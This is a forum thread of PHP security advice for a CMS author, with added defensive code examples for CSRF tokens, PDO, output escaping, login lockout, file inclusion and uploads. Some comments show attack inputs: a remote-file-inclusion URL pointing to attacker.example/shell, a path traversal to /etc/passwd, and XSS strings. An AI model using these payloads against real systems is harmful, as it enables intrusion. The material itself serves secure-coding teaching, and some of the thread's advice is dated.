PHP Security Checklist

Hi everybody!

I’m in the process of writing out a CMS system for a friend’s website, and I’ve got to the point where I’ll be deploying it.

Of course, I want it to be as secure as reasonably possible. Is there a security checklist online so I can go through the code and tick off as many possible problems as I can?

Thanks :slight_smile:

[ot]Go ahead :stuck_out_tongue:

I was just back reading this thread and thought I would point out that he’s a SitePoint member. :)[/ot]

I’ll start off with some points

  • Prevent session hijacking.
  • Escape all output (htmlspecialchars, etc)
  • Use form tokens to prevent cross site scripting
  • Do not keep your db access details in web-accessible files; in fact, move all php files outside the web dir and use an index.php to dispatch control.
  • Brute force login protection
  • Use mysql_real_escape_string not just addslashes

There’s a couple of php books on this topic.
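The "form tokens" item above, worked through as an added example (this is not code from the thread or from the OP's CMS). Form tokens defend against cross-site request forgery, i.e. a page on another site submitting a state-changing POST with the victim's cookies; the token proves the form was rendered by this session. It assumes PHP 7+ (for random_bytes) and that the front controller has already called session_start(); the form action URL is made up.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread): per-session form tokens against
// cross-site request forgery. Assumes the front controller has already
// started the session with session_start().

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the OS CSPRNG, hex-encoded so it embeds safely in HTML.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    // hash_equals() runs in constant time, so an attacker cannot learn the
    // token byte by byte from response timing. Known value goes first.
    return hash_equals($expected, $given);
}

// Handler for a state-changing form, e.g. "delete page" (hypothetical URL).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid form token');
    }
    // ... the request really came from a form this session rendered ...
}

echo '<form method="post" action="/admin/delete">'
   . csrf_field()
   . '<button type="submit">Delete</button></form>';
```

Two things the token does not do on its own: nothing that changes state may be reachable by GET (a GET handler is never checked here), and the token is only as secret as the page it is printed on, so output escaping elsewhere still matters. One token per session is the simplest scheme; a per-form nonce that is invalidated after use is a tightening, not a replacement.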

Good points.
check this out: http://mysql-apache-php.com/basic-linux-security.htm

Read Eric Schiflett’s book, “Essential PHP Security”. short read, to the point, and worth it!

There’s also a php architect’s guide to php security.

No.
Use PDO and prepared statements. http://fr.php.net/manual/en/book.pdo.php

To escape inputs, use the filter functions : http://fr.php.net/manual/en/ref.filter.php

With a few exceptions, you should assume any predefined variable or value is dirty. Even a lot of the stuff in $_SERVER.
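The PDO and filter-function advice above, as an added example that is not code from the thread. It assumes a table `posts(id, title, body)`, a config file outside the web root that returns the DSN and credentials (the path is made up), and the `posts` columns named in the queries.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread). Assumes posts(id INT, title TEXT, body TEXT)
// and a config file outside the web root returning ['dsn' => ..., 'user' => ..., 'pass' => ...].
// The path is hypothetical.

$config = require '/srv/cms/config/db.php';
$pdo = new PDO($config['dsn'], $config['user'], $config['pass'], [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    // Real server-side prepares: SQL text and parameters travel separately,
    // so there is no escaping step to forget and no charset to get wrong.
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// 1. Validate input with the filter extension rather than ad-hoc checks.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Bad id');
}

// Vulnerable version, for contrast (request data interpolated into SQL):
//   $sql = "SELECT title, body FROM posts WHERE id = " . $_GET['id'];

// 2. Bind the value; the database never parses it as SQL.
$stmt = $pdo->prepare('SELECT title, body FROM posts WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$post = $stmt->fetch(PDO::FETCH_ASSOC);

// 3. Two things prepared statements do NOT cover.
//    a) LIKE wildcards: '%' and '_' in bound input are still wildcards, so a
//       search for "%" matches every row. Escape them with an explicit ESCAPE char.
$q = filter_input(INPUT_GET, 'q', FILTER_DEFAULT);
if (!is_string($q)) {
    $q = '';
}
$stmt = $pdo->prepare("SELECT id, title FROM posts WHERE title LIKE :q ESCAPE '!'");
$stmt->execute([':q' => '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $q) . '%']);
$results = $stmt->fetchAll(PDO::FETCH_ASSOC);

//    b) Identifiers (column names, sort order) cannot be bound at all.
//       Map the request value onto a fixed table and interpolate only that.
$sortable = ['title' => 'title', 'newest' => 'id DESC'];
$key  = $_GET['sort'] ?? 'newest';
$sort = is_string($key) && isset($sortable[$key]) ? $sortable[$key] : 'id DESC';
$rows = $pdo->query("SELECT id, title FROM posts ORDER BY $sort")->fetchAll(PDO::FETCH_ASSOC);
```

The `filter_input()` calls return `null` when the key is absent and `false` when validation fails, so both are checked. Turning emulated prepares off matters for MySQL in particular: with emulation on, PDO quotes the values client-side, which reintroduces the charset-dependent escaping problem the thread's next post warns about.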

What do you have to do to “prevent session hijacking”?

And what technique do you use for form tokens?

Always keep in mind what character set your data is in and use the proper methods to deal with it (e.g. always specify the correct charset when using htmlentities()) otherwise you might end up with security problems even though you’re “escaping.”
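An added example (not code from the thread) of the charset-aware output escaping the post above recommends, with the output context made explicit as well. It assumes PHP 7.3+ for JSON_THROW_ON_ERROR; the attacker inputs are constructed.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread): output escaping that is explicit about
// the character set and about the output context.

// Declare UTF-8 once at the HTTP layer so the browser decodes bytes the same
// way the escaper validated them. A mismatch between the two is how
// "escaped" output can still turn into markup.
header('Content-Type: text/html; charset=UTF-8');

/** Escape for element text or a quoted attribute value. */
function e(string $s): string
{
    // ENT_QUOTES: also escape ' so single-quoted attributes are safe.
    // ENT_SUBSTITUTE: replace invalid UTF-8 with U+FFFD instead of returning
    // the empty string, which silently blanks the content.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Escape a PHP value for use as a literal inside a <script> block. */
function js($v): string
{
    // json_encode yields a JS literal; the HEX flags keep it safe inside HTML
    // even when the value contains </script>, quotes or ampersands.
    return json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed attacker inputs:
$title = '<img src=x onerror=alert(1)>';
$attr  = '" onmouseover="alert(1)';          // tries to break out of a double-quoted attribute
$bad   = "\xC0\xBC" . 'script';              // overlong (invalid) UTF-8 encoding of '<'

echo '<h1>' . e($title) . '</h1>';           // &lt;img src=x onerror=alert(1)&gt;
echo '<input value="' . e($attr) . '">';     // &quot; onmouseover=&quot;alert(1)
echo '<p>' . e($bad) . '</p>';               // replacement character(s) + "script"; the bogus bytes never reach the browser
echo '<script>var t = ' . js($title) . ';</script>';
```

The overlong sequence is the point of the charset argument: told the data is UTF-8, `htmlspecialchars()` validates it and refuses the bytes; told nothing, or told the wrong charset, an escaper may pass them through for a lenient decoder on the client to turn into a real `<`. The same reasoning applies to the database connection charset when escaping for SQL.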

Start over.

Seriously, though. You should be thinking “How do I make this secure?” before the first line of code is written, not when you’re getting ready to push to production. That’s why there are so many insecure programs on the market today (and PHP is notoriously bad for hosting many of them).

  1. Use HTML Purifier or similar library to purify sensitive content before saving to the database
  2. Use htmlentities() for everything that can be viewed by users
  3. Don’t use just hashing for passwords, use also salt (plus you can add another layer of protection by encrypting the hashes)
  4. session_regenerate_id(), session_cache_expire() etc
  5. Use captchas on all public forms against spam and fake registrations
  6. Limit number of failed login attempts - if user cannot get his username and password right 5 times in a row, disable his account
  7. Use prepared statements (PDO or MySQLi) or at least mysql_real_escape_string()
  8. Disable magic_quotes and auto_globals!
  9. Use the latest stable version of PHP
  10. https:// instead of http:// on pages where sensitive data is being processed
  11. Keep configuration files outside the web root directory
  12. Filter and validate all $_POST and $_GET data
  13. Blacklist troublesome IPs (trying brute force attacks or spamming your comments sections etc)

And there is much more.
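Items 3, 4 and 6 of the list above, worked through in one login path as an added example (not code from the thread). It also covers the session-fixation part of the earlier "how do you prevent session hijacking?" question. It assumes PHP 7.3+ (array form of session_set_cookie_params), a PDO connection in `$pdo`, and a hypothetical table `users(id, username, password_hash, failed_logins, locked_until DATETIME NULL)`. `password_hash()` salts each password itself, so no separate salt handling appears.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread). Assumes PHP 7.3+, a PDO connection in
// $pdo, and a hypothetical table
// users(id, username, password_hash, failed_logins, locked_until DATETIME NULL).

const MAX_FAILED_LOGINS = 10;      // a temporary cooldown, not a permanent disable
const LOCKOUT_SECONDS   = 15 * 60;

function start_hardened_session(): void
{
    ini_set('session.use_only_cookies', '1');  // no session IDs in URLs
    ini_set('session.use_strict_mode', '1');   // refuse IDs the server never issued
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // https only
        'httponly' => true,   // not readable by JavaScript, so XSS cannot copy it
        'samesite' => 'Lax',
    ]);
    session_start();
}

function register(PDO $pdo, string $username, string $password): void
{
    // password_hash() generates a random per-password salt and stores it
    // inside the hash string; there is no salt column to manage.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $pdo->prepare('INSERT INTO users (username, password_hash, failed_logins) VALUES (?, ?, 0)')
        ->execute([$username, $hash]);
}

function login(PDO $pdo, string $username, string $password): bool
{
    static $dummyHash = null;
    $dummyHash = $dummyHash ?? password_hash('dummy', PASSWORD_DEFAULT);

    $stmt = $pdo->prepare('SELECT id, password_hash, failed_logins, locked_until FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($user === false) {
        // Unknown user: spend the same hashing time so response timing does
        // not reveal which usernames exist.
        password_verify($password, $dummyHash);
        return false;
    }
    if ($user['locked_until'] !== null && strtotime($user['locked_until']) > time()) {
        return false;
    }
    if (!password_verify($password, $user['password_hash'])) {
        // locked_until is assigned before failed_logins so the CASE sees the
        // old counter on MySQL, which evaluates SET clauses left to right.
        $pdo->prepare('UPDATE users
                       SET locked_until = CASE WHEN failed_logins + 1 >= ? THEN ? ELSE locked_until END,
                           failed_logins = failed_logins + 1
                       WHERE id = ?')
            ->execute([MAX_FAILED_LOGINS, date('Y-m-d H:i:s', time() + LOCKOUT_SECONDS), $user['id']]);
        return false;
    }

    // Success: clear the counter and re-hash if PASSWORD_DEFAULT or its cost moved on.
    $newHash = password_needs_rehash($user['password_hash'], PASSWORD_DEFAULT)
        ? password_hash($password, PASSWORD_DEFAULT)
        : $user['password_hash'];
    $pdo->prepare('UPDATE users SET failed_logins = 0, locked_until = NULL, password_hash = ? WHERE id = ?')
        ->execute([$newHash, $user['id']]);

    // Fresh session ID on privilege change: an ID an attacker planted before
    // login (session fixation) no longer maps to the authenticated session.
    session_regenerate_id(true);
    $_SESSION['user_id'] = (int) $user['id'];
    return true;
}
```

The lockout is a timed cooldown with a higher threshold rather than the permanent disable in item 6, because a permanent per-account lock lets anyone who knows a username lock its owner out, which is the complaint raised further down the thread. The cookie flags and `use_strict_mode` address the other half of session hijacking: an ID that cannot be read by script, is only sent over https, and is never accepted unless the server issued it.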

I assume you mean Chris Shiflett? But yes, that book’s very good.

I agree in principle, but 5 times is not enough for a regular person. You can raise that to 10 or even 50, and still combat brute force.

I only chime in with this because I always forget which email address, user name or password I used for a particular site… sometimes I have to guess more than 5 times… and I HATE getting my account locked. :smiley:

To the OP, if you even have to ask this question - do yourself a favor and get one of the good books mentioned above that cover the topic in detail. Seriously, you need an education that you won’t get from a few forum posts. Just trying to help.

Disable url_fopen if you don’t need it–most of the nastier exploits rely upon using url_fopen to download nefarious files from various sites. Not having the option can greatly limit damage.

I agree; if you really need to get content from some other website just use sockets. True, it’s a little bit more hassle, but so much safer! :slight_smile:
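An added example (not code from the thread) of what the allow_url_fopen advice above is protecting against, shown next to the single-index.php dispatch suggested earlier in the thread. The directory paths and route names are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread). Paths and route names are hypothetical.
//
// php.ini (both settings are PHP_INI_SYSTEM, so ini_set() cannot flip them):
//   allow_url_fopen   = Off   ; fopen()/file_get_contents() on http:// URLs
//   allow_url_include = Off   ; include/require of URLs (separate switch since PHP 5.2)

// Vulnerable dispatcher, for contrast. With allow_url_include on this is remote
// file inclusion (?page=http://attacker.example/shell); with it off it is still
// local file inclusion (?page=../../../../etc/passwd).
//
//   include $_GET['page'] . '.php';

// Hardened dispatcher: request names map onto a fixed table, and the only
// path that reaches include comes from that table, never from the request.
const CONTROLLER_DIR = '/srv/cms/app/controllers';   // outside the web root
const ROUTES = [
    'home'    => 'home.php',
    'page'    => 'page.php',
    'contact' => 'contact.php',
];

function resolve_controller(string $route): string
{
    $file = ROUTES[$route] ?? '404.php';
    $path = realpath(CONTROLLER_DIR . '/' . $file);
    // Belt and braces: even a typo in ROUTES cannot escape the controller dir.
    if ($path === false || strpos($path, CONTROLLER_DIR . '/') !== 0) {
        throw new RuntimeException('controller resolved outside controller dir');
    }
    return $path;
}

/** Names of the URL-fetching ini switches that are still enabled. */
function insecure_ini_settings(): array
{
    $bad = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $flag) {
        if (filter_var(ini_get($flag), FILTER_VALIDATE_BOOLEAN)) {
            $bad[] = $flag;
        }
    }
    return $bad;
}

// index.php, the one PHP file left inside the web root:
foreach (insecure_ini_settings() as $flag) {
    error_log("deployment check: {$flag} is On; turn it off in php.ini unless it is needed");
}
$route = $_GET['page'] ?? 'home';
if (!is_string($route) || !isset(ROUTES[$route])) {
    http_response_code(404);
    $route = '';   // falls through to 404.php
}
include resolve_controller($route);
```

With `allow_url_fopen` off, deliberate outbound requests still work through the curl extension or the raw sockets the reply above mentions; what goes away is the ability of any stream function that receives attacker-controlled input to fetch from the network.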

The checklist I use is a book called “Essential PHP Security”, author - Chris Shiflett, publisher - O’Reilly.

Any other checklist you might find is either going to be wrong or will be a subset of what is in the book.

The XSS Cheat Sheet is a checklist for XSS (cross site scripting) exploits.

Note that even if you have no XSS exploits, you also need to check for CSRF (cross domain request forgery), login-CSRF, and even clickjacking, and that is just on the client side. Server-side you will need to check for SQL and command injection flaws, and all manner of other validation and filtering related vulnerabilities.

Essential PHP Security is quite dated, so I wouldn’t use that as a definitive checklist. For one, I don’t think it even mentions the danger of serving uploaded files inline. There are probably other things that it is missing.

I don’t know of any definite checklist though. Maybe I’ll start one.
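The "serving uploaded files inline" gap mentioned above, as an added example that is not code from the thread: uploads go to a directory outside the web root under a server-chosen name, and are served back through a script that fixes the content type and forces a download. It assumes the fileinfo extension and PHP 7+; the upload directory path and the allowed-type table are made up.

```php
<?php
declare(strict_types=1);
// Added example (not from the thread). Assumes the fileinfo extension and
// PHP 7+. The directory and the allowed-type table are hypothetical.

const UPLOAD_DIR    = '/srv/cms/uploads';   // outside the web root, never served directly
const ALLOWED_TYPES = [
    'image/png'       => 'png',
    'image/jpeg'      => 'jpg',
    'application/pdf' => 'pdf',
];

/** Store one entry of $_FILES; returns the stored name or null on rejection. */
function store_upload(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Sniff the type from the bytes, not from the client's filename or $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    // Random server-chosen name: the original filename never touches the filesystem,
    // and the extension is derived from the sniffed type, not from the upload.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        return null;
    }
    return $name;
}

/** Serve a stored upload as a download, never inline in the site's origin. */
function serve_upload(string $name): void
{
    // Accept only the exact shape store_upload() produces; no traversal possible.
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg|pdf)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $mime = array_search(pathinfo($name, PATHINFO_EXTENSION), ALLOWED_TYPES, true);

    header('Content-Type: ' . $mime);
    // nosniff stops the browser from second-guessing the type from content, and
    // "attachment" keeps a PDF with embedded script, or an image that is really
    // HTML, from rendering with this site's cookies and origin.
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

// Usage: upload handler and download endpoint (hypothetical URLs).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['attachment'])) {
    $stored = store_upload($_FILES['attachment']);
    echo $stored === null ? 'Rejected' : 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
} elseif (isset($_GET['file']) && is_string($_GET['file'])) {
    serve_upload($_GET['file']);
}
```

If some uploads must display inline (images in posts, say), the safer variant is to serve them from a separate hostname that carries no session cookie, so that even a file a browser decides to treat as HTML runs in a throwaway origin; the `attachment` disposition above is the option that needs no second domain.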